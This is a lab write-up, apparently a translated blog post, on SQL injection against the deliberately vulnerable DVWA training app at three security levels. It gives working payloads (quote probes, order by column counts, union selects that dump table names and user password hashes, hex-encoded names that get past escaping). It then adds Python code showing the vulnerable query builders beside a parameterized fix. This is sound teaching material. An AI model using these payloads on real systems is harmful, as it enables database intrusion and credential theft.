SQL injection in DVWA (1)
1. Low level
1. Enter an ID and observe the echo:
2. Determine the injection type:
Entering 1' and '1'='1 # echoes successfully:
Entering 1' and '1'='2 # fails to echo:
So this is single-quote (string) injection.
3. Determine the number of columns and the echo positions
Use an order by clause to determine the number of columns.
1' order by 3 # returns an error:
1' order by 2 # echoes successfully, so there are 2 columns:
4. Use a union query to find the echo positions and get the current database
-1' union select 1 , 2 # shows the echo positions: both columns are echoed.
Use the database() function to get the current database:
5. Get the table name
-1' union select 1 , group_concat(table_name) from information_schema.tables where table_schema = 'dvwa' #
Get the table names:
6. Get the field name
-1' union select 1 , group_concat(column_name) from information_schema.columns where table_name = 'users' #
Get the field names:
7. Obtain the key information (user names, passwords)
-1' union select user , password from users #
Get the user names and passwords:
Key statement in the source code:
2. Medium level
The ID is now a drop-down list with no input box, so use Burp Suite to capture the request and inject into it.
Determining the injection type and database name works as before: this is numeric injection, and the database name is 'voice'.
Determine the table name
Using -1 union select 1 , group_concat(table_name) from information_schema.tables where table_schema = 'dvwa' # produces an error:
Checking the source code shows that special characters are escaped:
So rewrite the SQL statement so that it needs no quotes:
-1 union select 1 , group_concat(table_name) from information_schema.tables where table_schema = database() #
Or write the database name dvwa in hex, 0x64767761, to bypass the escaping:
Determine the field name
In the same way, use the hex code 0x7573657273 for the table name users:
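The low level and the medium level fail for different reasons: at low level the value is dropped inside a quoted string with no escaping at all, and at medium level quotes are escaped but the value is inserted unquoted as a number, so escaping never comes into play. The following is an added example, not DVWA's code or the original post's, that puts the two vulnerable query builders beside a parameterized one and runs the page's own probes against an in-memory SQLite database standing in for MySQL. Because SQLite has no # comment and no information_schema, the example uses -- and sqlite_master instead; the users table contents are constructed sample rows.

```python
import sqlite3

# Constructed sample rows standing in for DVWA's users table (not real DVWA data).
SAMPLE_USERS = [
    (1, "alice", "hash-of-alice-pw", "Alice", "Anderson"),
    (2, "bob", "hash-of-bob-pw", "Bob", "Brown"),
]


def make_db():
    """Build an in-memory SQLite database with a DVWA-like users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (user_id INTEGER, user TEXT, password TEXT, "
        "first_name TEXT, last_name TEXT)"
    )
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?, ?)", SAMPLE_USERS)
    conn.commit()
    return conn


def query_low(conn, user_id):
    """Low level: the raw value is dropped inside single quotes.
    Any value containing a quote closes the string literal and the rest is parsed as SQL."""
    sql = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return conn.execute(sql).fetchall()


def query_medium(conn, user_id):
    """Medium level: quotes are escaped (a stand-in for the escaping DVWA applies),
    but the value is inserted unquoted as a number, so no quote is needed to inject."""
    escaped = user_id.replace("'", "''")
    sql = f"SELECT first_name, last_name FROM users WHERE user_id = {escaped}"
    return conn.execute(sql).fetchall()


def query_fixed(conn, user_id):
    """Hardened: the value is bound as a parameter, so it is compared as data
    and never parsed as SQL, whatever characters it contains."""
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return conn.execute(sql, (user_id,)).fetchall()


def probe(fn, conn, value):
    """Run one query builder and return its rows, or None when the database
    rejects the SQL (the 'error' signal the order by column count relies on)."""
    try:
        return fn(conn, value)
    except sqlite3.Error:
        return None


if __name__ == "__main__":
    db = make_db()
    for builder in (query_low, query_medium, query_fixed):
        print(builder.__name__, "normal id:", probe(builder, db, "1"))
        print(builder.__name__, "quote probe:", probe(builder, db, "1' and '1'='1"))
        print(builder.__name__, "numeric union:",
              probe(builder, db, "-1 union select 1, group_concat(name) from sqlite_master"))
```

The parameterized builder returns the normal row for "1" and nothing for every probe, because the bound string is compared against the integer column as a value rather than spliced into the statement. For an id that must be numeric, validating it as an integer before the query is a cheap extra layer, but parameter binding is the control that removes the injection regardless of the input.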
3. High level
The ID is now entered on a separate pop-up page, which is meant to prevent injection with automated tools.
The judgment steps are the same as before, and it turns out to be single-quote character injection.
Refer to the low-level injection.